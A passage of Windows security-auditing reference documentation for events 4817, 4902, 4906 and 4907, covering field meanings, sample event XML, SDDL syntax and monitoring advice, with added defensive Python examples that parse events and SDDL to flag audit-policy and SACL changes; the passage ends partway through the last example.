For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “LSA” value for this event.
Object Type [Type = UnicodeString]: The type of an object to which this event applies. Always “Global
SACL” for this event.
The following table contains the list of the most common Object Types:

Directory | Event | Timer | Device
Mutant | Type | File | Token
Thread | Section | WindowStation | DebugObject
FilterCommunicationPort | EventPair | Driver | IoCompletion
Controller | SymbolicLink | WmiGuid | Process
Profile | Desktop | KeyedEvent | Central Access Policies
Key | WaitablePort | Callback | Global SACL
Job | Port | FilterConnectionPort |
ALPC Port | Semaphore | Adapter |

Object Name:
Key – if “Registry” Global Object Access Auditing policy was changed.
File – if “File system” Global Object Access Auditing policy was changed.
Auditing Settings:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language
(SDDL) value for the Global Object Access Auditing policy. Empty if the Global Object Access Auditing policy
SACL was not set.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language
(SDDL) value for the Global Object Access Auditing policy.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating
information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of a specific security principal, or a reserved (pre-defined) value, for example: BA
(BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values
in the table below:

"AO" - Account operators
"RU" - Alias to allow previous Windows 2000
"AN" - Anonymous logon
"AU" - Authenticated users
"BA" - Built-in administrators
"BG" - Built-in guests
"BO" - Backup operators
"BU" - Built-in users
"CA" - Certificate server administrators
"CG" - Creator group
"CO" - Creator owner
"DA" - Domain administrators
"DC" - Domain computers
"DD" - Domain controllers
"DG" - Domain guests
"DU" - Domain users
"EA" - Enterprise administrators
"ED" - Enterprise domain controllers
"WD" - Everyone
"PA" - Group Policy administrators
"IU" - Interactively logged-on user
"LA" - Local administrator
"LG" - Local guest
"LS" - Local service account
"SY" - Local system
"NU" - Network logon user
"NO" - Network configuration operators
"NS" - Network service account
"PO" - Printer operators
"PS" - Personal self
"PU" - Power users
"RS" - RAS servers group
"RD" - Terminal server users
"RE" - Replicator
"RC" - Restricted code
"SA" - Schema administrators
"SO" - Server operators
"SU" - Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD )
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"AL" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ACE.
"IO" - INHERITANCE ONLY: the ACE doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: a hexadecimal string or reserved value which denotes the access mask, for example: FA (File All Access),
FX (File Execute), FW (File Write), etc.

Generic access rights:
"GA" - GENERIC ALL
"GR" - GENERIC READ
"GW" - GENERIC WRITE
"GX" - GENERIC EXECUTE
File access rights:
"FA" - FILE ALL ACCESS
"FR" - FILE GENERIC READ
"FW" - FILE GENERIC WRITE
"FX" - FILE GENERIC EXECUTE
Registry key access rights:
"KA" - KEY ALL ACCESS
"KR" - KEY READ
"KW" - KEY WRITE
"KX" - KEY EXECUTE
Directory service access rights:
"RC" - Read Permissions
"SD" - Delete
"WD" - Modify Permissions
"WO" - Modify Owner
"RP" - Read All Properties
"WP" - Write All Properties
"CC" - Create All Child Objects
"DC" - Delete All Child Objects
"LC" - List Contents
"SW" - All Validated Writes
"LO" - List Object
"DT" - Delete Subtree
"CR" - All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone),
SY (LOCAL_SYSTEM ), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.

Security Monitoring Recommendations
For 4817(S): Auditing settings on object were changed.
If you use Global Object Access Auditing policies, then this event should always be monitored, especially on
high value assets or computers. If this change was not planned, investigate the reason for the change.
If you don’t use Global Object Access Auditing policies, then this event should always be monitored because
it indicates use of Global Object Access Auditing policies outside of your standard procedures.
4902(S): The Per-user audit policy table was created.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates during system startup if Per-user audit policy is defined on the computer.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4902</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T00:05:25.814466500Z" />
<EventRecordID>1049490</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="556" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="PuaCount">1</Data>
<Data Name="PuaPolicyId">0x703e</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Number of Elements [Type = UInt32]: number of users for which Per-user policies were defined (number of
unique users). You can get the list of users for which Per-user policies are defined using the “auditpol /list /user”
command:

Policy ID [Type = HexInt64]: unique Per-user Audit Policy hexadecimal identifier.

Security Monitoring Recommendations
For 4902(S): The Per-user audit policy table was created.
If you don’t expect to see any per-User Audit Policies enabled on specific computers (Computer), monitor
for these events.
If you don’t use per-User Audit Policies in your network, monitor for these events.
Typically this is an informational event and has little to no security relevance.
4906(S): The CrashOnAuditFail value has changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates every time the CrashOnAuditFail audit flag value is modified.
This event is always logged regardless of the "Audit Policy Change" sub-category setting.
More information about the CrashOnAuditFail flag can be found here.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4906</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T00:45:07.048458800Z" />
<EventRecordID>1049529</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="532" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="CrashOnAuditFailValue">1</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
New Value of CrashOnAuditFail [Type = UInt32]: contains new value of CrashOnAuditFail flag. Possible
values are:
0 - The feature is off. The system does not halt, even when it cannot record events in the Security Log.
1 - The feature is on. The system halts when it cannot record an event in the Security Log.
2 - The feature is on and has been triggered. The system halted because it could not record an auditable
event in the Security Log. Only members of the Administrators group can log on.

Security Monitoring Recommendations
For 4906(S): The CrashOnAuditFail value has changed.
Any changes of CrashOnAuditFail audit flag that are reported by this event must be monitored, and an alert
should be triggered. If this change was not planned, investigate the reason for the change.
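The following script is an added example for the two recommendations above (4719 and 4906); it is not part of the Microsoft documentation or of any Microsoft tool. It reads Security-log event XML and classifies each event for an alert pipeline: a 4719 whose “Changes” field removes Success or Failure auditing is escalated regardless of host, any other 4719 is escalated on the hosts listed in HIGH_VALUE_HOSTS (an assumed list), and every 4906 is escalated, with value 2 treated as critical because the host has already halted. The 4719 sample is constructed and assumes the same data names the 4912 event on this page shows (SubjectUserName, SubjectDomainName, SubcategoryGuid, AuditPolicyChanges); its “Changes” value is written as Event Viewer renders it, whereas a raw event carries %%-resource codes that must be resolved first. The 4906 sample mirrors the documented event.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumption: hosts on which any audit-policy change is escalated (e.g. domain controllers).
HIGH_VALUE_HOSTS = {"DC01.contoso.local"}

# Meaning of the CrashOnAuditFail values documented for event 4906.
CRASH_ON_AUDIT_FAIL = {
    "0": "off; the system keeps running even if it cannot write the Security log",
    "1": "on; the system halts when it cannot write the Security log",
    "2": "on and already triggered; the system halted and only Administrators can log on",
}


def parse_event(xml_text):
    """Return (event_id, computer, {data name: value}) for one Security-log event."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event_id = int(system.find("e:EventID", NS).text)
    computer = system.find("e:Computer", NS).text
    event_data = root.find("e:EventData", NS)
    data = {d.get("Name"): (d.text or "").strip() for d in event_data} if event_data is not None else {}
    return event_id, computer, data


def triage(xml_text):
    """Classify one 4719 or 4906 event; returns a finding dict for an alert pipeline."""
    event_id, computer, data = parse_event(xml_text)
    finding = {"event_id": event_id, "computer": computer}
    if event_id == 4719:
        subject = f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}"
        changes = [c.strip() for c in data.get("AuditPolicyChanges", "").split(",") if c.strip()]
        removed = [c for c in changes if c.endswith("removed")]
        target = f"subcategory {data.get('SubcategoryGuid', '?')}"
        if removed:
            # Removing Success/Failure auditing weakens coverage: always escalate.
            finding.update(severity="high",
                           reason=f"{subject} removed auditing ({', '.join(removed)}) for {target}")
        else:
            finding.update(severity="high" if computer in HIGH_VALUE_HOSTS else "medium",
                           reason=f"{subject} changed audit policy ({', '.join(changes)}) for {target}")
    elif event_id == 4906:
        value = data.get("CrashOnAuditFailValue", "")
        meaning = CRASH_ON_AUDIT_FAIL.get(value, "unknown value")
        # The documentation asks for an alert on every change; value 2 means the host already halted.
        finding.update(severity="critical" if value == "2" else "high",
                       reason=f"CrashOnAuditFail is now {value} ({meaning})")
    else:
        finding.update(severity="info", reason="not handled by this triage function")
    return finding


# Constructed sample events (see the lead-in for what is assumed about them).
SAMPLE_4719 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4719</EventID>
<Channel>Security</Channel><Computer>WS01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x11ae30</Data>
<Data Name="SubcategoryGuid">{0CCE922B-69AE-11D9-BED3-505054503030}</Data>
<Data Name="AuditPolicyChanges">Success removed, Failure removed</Data>
</EventData></Event>"""

SAMPLE_4906 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4906</EventID>
<Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>
<EventData><Data Name="CrashOnAuditFailValue">1</Data></EventData></Event>"""

if __name__ == "__main__":
    for sample in (SAMPLE_4719, SAMPLE_4906):
        print(triage(sample))
```

Feeding real events requires exporting them from the Security channel as XML first (for example with the Event Viewer XML view or wevtutil); the resolution of %%-codes in the 4719 “Changes” field is the one step this example does not perform.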
4907(S): Auditing settings on object were changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates when the SACL of an object (for example, a registry key or file) was changed.
This event doesn't generate for Active Directory objects.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4907</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T18:18:19.458828800Z" />
<EventRecordID>1049732</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="508" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">Key</Data>
<Data Name="ObjectName">\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\EventLog\\Internet Explorer</Data>
<Data Name="HandleId">0x2f8</Data>
<Data Name="OldSd">S:AI</Data>
<Data Name="NewSd">S:ARAI(AU;CISA;KA;;;S-1-5-21-3457937927-2839227994-823803824-1104)</Data>
<Data Name="ProcessId">0x120c</Data>
<Data Name="ProcessName">C:\\Windows\\regedit.exe</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that made a change to the object’s auditing settings. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to object’s auditing
settings.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following table contains the list of the most common Object Types:

Directory | Event | Timer | Device
Mutant | Type | File | Token
Thread | Section | WindowStation | DebugObject
FilterCommunicationPort | EventPair | Driver | IoCompletion
Controller | SymbolicLink | WmiGuid | Process
Profile | Desktop | KeyedEvent | SC_MANAGER OBJECT
Key | WaitablePort | Callback |
Job | Port | FilterConnectionPort |
ALPC Port | Semaphore | Adapter |

Object Name [Type = UnicodeString]: full path and name of the object for which the SACL was modified.
Depends on Object Type. Here are some examples:
The format for Object Type = “Key” is: \REGISTRY\HIVE\PATH where:
HIVE:
HKEY_LOCAL_MACHINE = \REGISTRY\MACHINE
HKEY_CURRENT_USER = \REGISTRY\USER\[USER_SID], where [USER_SID] is the SID of the current user.
HKEY_CLASSES_ROOT = \REGISTRY\MACHINE\SOFTWARE\Classes
HKEY_USERS = \REGISTRY\USER
HKEY_CURRENT_CONFIG = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\Current
PATH – path to the registry key.
The format for Object Type = “File” is: full path and name of the file or folder for which SACL was
modified.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4656: A handle
to an object was requested.” for registry keys, or the Handle ID field in “4656(S, F): A handle to an
object was requested.” for file system objects. This parameter might not be captured in the event, and
in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the object’s SACL was
changed. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Auditing Settings:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language
(SDDL) value for the object.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language
(SDDL) value for the object.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating
information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of a specific security principal, or a reserved (pre-defined) value, for example: BA
(BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values
in the table below:

"AO" - Account operators
"RU" - Alias to allow previous Windows 2000
"AN" - Anonymous logon
"AU" - Authenticated users
"BA" - Built-in administrators
"BG" - Built-in guests
"BO" - Backup operators
"BU" - Built-in users
"CA" - Certificate server administrators
"CG" - Creator group
"CO" - Creator owner
"DA" - Domain administrators
"DC" - Domain computers
"DD" - Domain controllers
"DG" - Domain guests
"DU" - Domain users
"EA" - Enterprise administrators
"ED" - Enterprise domain controllers
"WD" - Everyone
"PA" - Group Policy administrators
"IU" - Interactively logged-on user
"LA" - Local administrator
"LG" - Local guest
"LS" - Local service account
"SY" - Local system
"NU" - Network logon user
"NO" - Network configuration operators
"NS" - Network service account
"PO" - Printer operators
"PS" - Personal self
"PU" - Power users
"RS" - RAS servers group
"RD" - Terminal server users
"RE" - Replicator
"RC" - Restricted code
"SA" - Schema administrators
"SO" - Server operators
"SU" - Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD )
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"AL" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ACE.
"IO" - INHERITANCE ONLY: the ACE doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: a hexadecimal string or reserved value which denotes the access mask, for example: FA (File All Access),
FX (File Execute), FW (File Write), etc.

Generic access rights:
"GA" - GENERIC ALL
"GR" - GENERIC READ
"GW" - GENERIC WRITE
"GX" - GENERIC EXECUTE
File access rights:
"FA" - FILE ALL ACCESS
"FR" - FILE GENERIC READ
"FW" - FILE GENERIC WRITE
"FX" - FILE GENERIC EXECUTE
Registry key access rights:
"KA" - KEY ALL ACCESS
"KR" - KEY READ
"KW" - KEY WRITE
"KX" - KEY EXECUTE
Directory service access rights:
"RC" - Read Permissions
"SD" - Delete
"WD" - Modify Permissions
"WO" - Modify Owner
"RP" - Read All Properties
"WP" - Write All Properties
"CC" - Create All Child Objects
"DC" - Delete All Child Objects
"LC" - List Contents
"SW" - All Validated Writes
"LO" - List Object
"DT" - Delete Subtree
"CR" - All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone),
SY (LOCAL_SYSTEM ), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.
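The following parser is an added example that covers the SDDL grammar described above for both 4817 and 4907 (the O:, G:, D: and S: sections, the P/AI/AR inheritance flags, and ACEs written as ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid); it is not Microsoft code and does not claim to implement every SDDL construct, only what this page documents. Its practical use is the audit_ace_changes function, which takes the Original and New Security Descriptor values of a 4817 or 4907 event and reports which audit ACEs were added or removed, so that a removed audit ACE (auditing being switched off on an object) can be alerted on separately from an added one. Rights are kept as the string Windows emitted (an alias such as KA or a hex mask); the function names and the Ace/SecurityDescriptor types are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

SECTION_RE = re.compile(r"([OGDS]):")   # O:, G:, D:, S: section markers
ACE_RE = re.compile(r"\(([^)]*)\)")      # one parenthesised ACE
INHERIT_FLAGS = ("P", "AI", "AR")        # inheritance_flags documented above
AUDIT_ACE_TYPES = ("AU", "OU")           # SYSTEM AUDIT / OBJECT SYSTEM AUDIT


@dataclass(frozen=True)
class Ace:
    ace_type: str
    flags: Tuple[str, ...]       # two-letter tokens such as CI, OI, SA, FA
    rights: str                  # alias (KA, FA, ...) or hex mask, exactly as emitted
    object_guid: str
    inherit_object_guid: str
    account_sid: str


@dataclass
class SecurityDescriptor:
    owner: Optional[str] = None
    group: Optional[str] = None
    dacl_flags: Tuple[str, ...] = ()
    dacl: Tuple[Ace, ...] = ()
    sacl_flags: Tuple[str, ...] = ()
    sacl: Tuple[Ace, ...] = ()


def _split_pairs(text: str) -> Tuple[str, ...]:
    """'CISA' -> ('CI', 'SA'); ace_flags are always two-letter tokens."""
    if len(text) % 2:
        raise ValueError(f"odd-length ace_flags: {text!r}")
    return tuple(text[i:i + 2] for i in range(0, len(text), 2))


def _parse_acl(body: str):
    """Parse 'ARAI(...)(...)' into (inheritance_flags, aces)."""
    paren = body.find("(")
    flags_text = body if paren < 0 else body[:paren]
    flags, i = [], 0
    while i < len(flags_text):
        # AI/AR are two letters, P is one; try the longer token first.
        if flags_text[i:i + 2] in INHERIT_FLAGS:
            flags.append(flags_text[i:i + 2]); i += 2
        elif flags_text[i] in INHERIT_FLAGS:
            flags.append(flags_text[i]); i += 1
        else:
            raise ValueError(f"unknown inheritance flag in {flags_text!r}")
    aces = []
    for m in ACE_RE.finditer(body):
        fields = m.group(1).split(";")
        if len(fields) != 6:
            raise ValueError(f"ACE must have 6 fields: {m.group(0)!r}")
        ace_type, ace_flags, rights, oguid, iguid, sid = fields
        aces.append(Ace(ace_type, _split_pairs(ace_flags), rights, oguid, iguid, sid))
    return tuple(flags), tuple(aces)


def parse_sddl(sddl: str) -> SecurityDescriptor:
    """Parse an SDDL string; '' (4817's OldSd when no SACL was set) yields an empty descriptor."""
    sd = SecurityDescriptor()
    if not sddl:
        return sd
    marks = list(SECTION_RE.finditer(sddl))
    if not marks or marks[0].start() != 0:
        raise ValueError(f"SDDL must start with O:, G:, D: or S: {sddl!r}")
    for n, m in enumerate(marks):
        end = marks[n + 1].start() if n + 1 < len(marks) else len(sddl)
        body, kind = sddl[m.end():end], m.group(1)
        if kind == "O":
            sd.owner = body
        elif kind == "G":
            sd.group = body
        elif kind == "D":
            sd.dacl_flags, sd.dacl = _parse_acl(body)
        else:
            sd.sacl_flags, sd.sacl = _parse_acl(body)
    return sd


def audit_ace_changes(old_sddl: str, new_sddl: str):
    """Audit ACEs (added, removed) between OldSd and NewSd of a 4817 or 4907 event."""
    old = {a for a in parse_sddl(old_sddl).sacl if a.ace_type in AUDIT_ACE_TYPES}
    new = {a for a in parse_sddl(new_sddl).sacl if a.ace_type in AUDIT_ACE_TYPES}
    return sorted(new - old, key=str), sorted(old - new, key=str)


def describe_ace(ace: Ace) -> str:
    """One-line rendering of an audit ACE for an alert body."""
    when = [f for f in ace.flags if f in ("SA", "FA")] or ["no SA/FA flag"]
    inherit = [f for f in ace.flags if f not in ("SA", "FA")]
    return (f"{ace.ace_type} audit on {'+'.join(when)} rights={ace.rights} "
            f"trustee={ace.account_sid} inherit={','.join(inherit) or '-'}")


if __name__ == "__main__":
    # Values from the documented 4907 event: the key's SACL went from S:AI to one audit ACE.
    added, removed = audit_ace_changes(
        "S:AI", "S:ARAI(AU;CISA;KA;;;S-1-5-21-3457937927-2839227994-823803824-1104)")
    print("added:  ", [describe_ace(a) for a in added])
    print("removed:", [describe_ace(a) for a in removed])
```

A non-empty removed list from audit_ace_changes is the case the recommendations single out: someone reduced what is audited on the object, which deserves a higher alert priority than an added ACE.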

Security Monitoring Recommendations
For 4907(S): Auditing settings on object were changed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor events related to specific Windows object types (“Object Type”), for example File or
Key, monitor this event for the corresponding “Object Type.”
If you need to monitor all SACL changes for specific files, folders, registry keys, or other object types,
monitor for “Object Name” field value which has specific object name.
If you have critical file or registry objects and you need to monitor all modifications (especially changes in
SACL ), monitor for specific “Object\Object Name”.
If you have high-value computers for which you need to monitor all changes for all or specific file or registry
objects, monitor for all 4907 events on these computers.
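The following script is an added example for the four recommendations above; it is not Microsoft code. It parses a 4907 event, rewrites a registry Object Name from the \REGISTRY\HIVE\PATH form into the HKEY_* form using the hive mapping documented in the Object Name field description, and matches the result against a watchlist of critical files and keys (an assumed list, as is HIGH_VALUE_HOSTS): a watchlist hit is rated high, any other 4907 on a high-value host medium, the rest low. The sample event mirrors the documented 4907 event; the doubled backslashes the page's XML listing shows are collapsed so either spelling matches.

```python
import fnmatch
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Native registry prefixes as they appear in Object Name, mapped to the documented hive names.
# Longer, more specific prefixes come first so HKCR/HKCC are not swallowed by HKLM.
HIVE_PREFIXES = [
    (r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\Current", "HKEY_CURRENT_CONFIG"),
    (r"\REGISTRY\MACHINE\SOFTWARE\Classes", "HKEY_CLASSES_ROOT"),
    (r"\REGISTRY\MACHINE", "HKEY_LOCAL_MACHINE"),
    (r"\REGISTRY\USER", "HKEY_USERS"),   # HKEY_CURRENT_USER is \REGISTRY\USER\<SID> under this hive
]

# Assumptions: objects whose SACL must only change under change control, and the hosts on which
# every 4907 is reviewed. Patterns are shell wildcards, matched case-insensitively.
WATCHLIST = [
    ("Key", r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\*"),
    ("Key", r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa*"),
    ("File", r"C:\Windows\System32\config\*"),
]
HIGH_VALUE_HOSTS = {"DC01.contoso.local"}


def normalize_object_name(object_type, object_name):
    """Rewrite a Key's \\REGISTRY\\... path into HKEY_* form; other object types are returned as-is."""
    name = object_name.replace("\\\\", "\\")   # collapse doubled backslashes from the XML listing
    if object_type != "Key":
        return name
    for prefix, hive in HIVE_PREFIXES:
        if name.lower().startswith(prefix.lower()):
            return hive + name[len(prefix):]
    return name


def evaluate_4907(xml_text):
    """Return a finding dict for a 4907 event, or None for any other event ID."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    if int(system.find("e:EventID", NS).text) != 4907:
        return None
    data = {d.get("Name"): (d.text or "").strip() for d in root.find("e:EventData", NS)}
    computer = system.find("e:Computer", NS).text
    obj_type = data.get("ObjectType", "")
    name = normalize_object_name(obj_type, data.get("ObjectName", ""))
    hits = [pat for t, pat in WATCHLIST
            if t == obj_type and fnmatch.fnmatchcase(name.lower(), pat.lower())]
    if hits:
        severity = "high"       # SACL changed on a critical object
    elif computer in HIGH_VALUE_HOSTS:
        severity = "medium"     # every 4907 on a high-value host is reviewed
    else:
        severity = "low"
    return {
        "computer": computer,
        "subject": f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}",
        "process": data.get("ProcessName", "").replace("\\\\", "\\"),
        "object_type": obj_type,
        "object": name,
        "old_sd": data.get("OldSd", ""),
        "new_sd": data.get("NewSd", ""),
        "watchlist_hits": hits,
        "severity": severity,
    }


# Constructed sample mirroring the documented 4907 event for DC01.
SAMPLE_4907 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4907</EventID>
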